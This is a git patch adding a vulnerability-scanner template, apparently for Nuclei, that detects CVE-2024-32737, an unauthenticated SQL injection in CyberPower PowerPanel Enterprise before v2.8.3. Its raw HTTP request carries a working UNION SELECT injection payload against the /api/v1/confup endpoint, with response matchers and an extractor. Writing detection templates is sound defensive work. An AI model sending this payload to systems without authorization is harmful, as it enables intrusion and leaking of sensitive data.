From 10d2193b60f190f363be44f920f4e5353251581f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 15 Oct 2024 17:26:05 +0530 Subject: [PATCH] Create CVE-2024-32737.yaml --- http/cves/2024/CVE-2024-32737.yaml | 54 ++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32737.yaml diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml new file mode 100644 index 0000000000..33ef509807 --- /dev/null +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-32737 + +info: + name: CyberPower - SQL Injection in MCUDBHelper (Contract Result Query) + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.  + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32737 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cyberpower,sqli + +http: + - raw: + - | + GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"finished"' + - '"success":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"modifiedtime":(["0-9.]+)"'